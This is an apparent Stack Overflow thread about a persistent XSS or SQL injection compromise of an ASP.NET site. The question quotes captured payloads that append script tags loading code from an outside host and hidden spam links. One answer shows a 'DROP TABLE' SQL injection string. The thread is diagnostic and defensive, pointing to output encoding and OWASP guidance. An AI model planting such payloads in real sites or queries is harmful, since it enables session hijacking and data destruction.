# Is it a SQL injection?

Tags: asp.net, sql, security

I am finding my SQL Server database fields getting hacked as follows. Please note that `Original Content` is existing value of the field and it gets changed to following.

```
Original Content</title><script src=http://dfrgcc.com/ur.php></script></title><a style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=6 >crack</a>
```

I assume it's a SQL injection attack. If not, please guide. I have ensured following, however the DB gets hacked every few days.

1) All my data access is in dataset files i.e. `app_code\DataLayer.xsd`. I call my data methods as follows.

```
Dim memberDAL As new membersTableAdapter 
Dim memberName As String = tbName.text
memberDAL.insertMember(memberName)
```

Does above code gets qualified as parametrized query. Is it safe data access as far as my problem is concerned. All data access is done in this manner. There are number of forms with lot of input fields, and the content DOES go in database. However what seems to be happening is not INSERT but a UPDATE. Even membership tables are being affected. e.g. in `aspnet_users` table a username called 'admin' changes to following.

```
admin</title><script src=http://dfrgcc.com/ur.php></script></title><a style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=1 >crack</a></title><script src=http://dfrgcc.com/ur.php></script>
```

2)I have used CAPTCHA to exclude bots, but this did not help.

I am on shared host, as per server admin I need to sanitize my code. Please advise.

Comment: Although everyone is down voting my answer I have seen this kind of XSS code injected through SQL injection on a site. The reason I think this may be the case is that you show "Original Content" in the DB which has been changed to include the XSS code. If this content is user generated instead then yes you should sanitize you input and output with HTML Encoding.

Answer (score 16, accepted):

This is an XSS attack. Your database has not been compromised, but it now contains links to externally hosted Javascript that is executed in the context of your domain. This means that they may be able to hijack users' sessions, or make requests on behalf of the user.

You should HTML encode the data that you output to the page - replacing the `<` with `&lt;` (and [the rest](http://www.w3schools.com/html/html_entities.asp)) will "contextually encode" the data, ensuring that what is supposed to be plain text (the "injected" HTML above) is output as text, and not interpreted by the browser as HTML (and Javascript).

To understand more, check the [OWASP article](https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29).

Comment: Also see the XSS Prevention cheat sheet https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

Comment: Thanks Andy. I will be using HTML encoding as suggested. I have spent last few days understanding more about XSS. I assume in my case it is 'persistent' XSS attack since user input is being saved in DB and hence more serious than 'reflected' attack. Just curious to know - how the attack affects my database - especially membership tables. Virtually all tables are getting injected. usernames in membership tables are appended with attack script. IS it something to do with hosted attack scripts hijacking the sessions. would you please enlighten me in my specific case.

Comment: "Virtually all tables are getting injected" - are these correlated to the "number of forms with lot of input fields"? The attack vector could be appending the payload to each field. Is every row affected? If so, you may have a SQLi or an authorisation issue (where a user can update any row by passing an ID or similar). Can you review your access logs to determine URLs used, and do you have a copy of the malicious script used?

Comment: @Andy - There is no co-relation between tables infected & number of forms. 2) Every row of affected table gets infected. There is a fix pattern of infection. I can use wildcard search & replace to get rid of malicious code. 3) here is a sample code that gets attached  -- </title><a style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=1 >crack</a></title>

Comment: @Andy - Apologies for bothering you, but I am about to implement XSS prevention using Antixss library - over a weekend :-( It will be great if you can help me identify the more specific solution i.e. XSS, SQLi or anything else.

Comment: You don't need to use a library to defeat XSS - simply HTML encode the text that you output to the page (although libraries may provide this functionality). As every row is being affected it could well be SQLi -as you "parametrize" your queries (assuming prepared statements?) traditional SQLi is unlikely unless there's a bug in the TableAdapter (did you write these yourself?). Perhaps ensure that if the application does not know the ID of a user it will not UPDATE anything. Apart from that you could activate query logging (and full HTTP request logging) and await the malicious user's return.

Comment: ...Perhaps ensure that if the application does not know the ID of a user it will not UPDATE anything

Answer (score 3):

It's not an SQL Injection, this is cross site scripting.

On an SQL Injection the attacker would try to inject SQL code into your query. For example if you have a query to retrieve - let's say - a student record:

```
SELECT * FROM students WHERE name = '$name' LIMIT 0,1
```

If I pass in the following as `name` and the developer hasn't done a good job sanitizing their input, something bad would happen: `$name = "Robert'; DROP TABLE students; --"` (See http://xkcd.com/327/) the resulting query would be

```
SELECT * FROM students WHERE name='Robert'; DROP TABLE students; --' LIMIT 0,1
```

I think I don't need to explain what this does :)

This XSS attack tries to inject HTML code (or in this case javascript code) into your page. If you don't filter out HTML tags or change the special characters to HTML entities (> to >) this code would be executed in the users browser.

Answer (score 3):

If you're seeing arbitrary markup inserted into your data, it *may* be a SQL injection attack. It also may be that the data has just been appended to form input and hasn't actually exercised any SQLi techniques - you just haven't white-listed allowable values.

As a result of this data, you now have a persistent XSS risk but the data almost certainly didn't get there *as a result* of XSS.

Try taking a look at [OWASP Top 10 for .NET developers part 1: Injection](http://www.troyhunt.com/2010/05/owasp-top-10-for-net-developers-part-1.html) then [OWASP Top 10 for .NET developers part 2: Cross-Site Scripting (XSS)](http://www.troyhunt.com/2010/05/owasp-top-10-for-net-developers-part-2.html). This should cover you need from protecting against SQLi to then ensuring XSS can't be exploited.

Answer (score -2):

Short answer is yes this is very likely to be an SQL Injection attack.

You will need to use a tool like Scawlr to find the actual attack vector:

https://h30406.www3.hp.com/campaigns/2008/wwcampaign/1-57C4K/index.php

Comment: The result is an XSS attack as Andy says above. But if the Original Content is not user generated then it is likely to be created by SQL Injection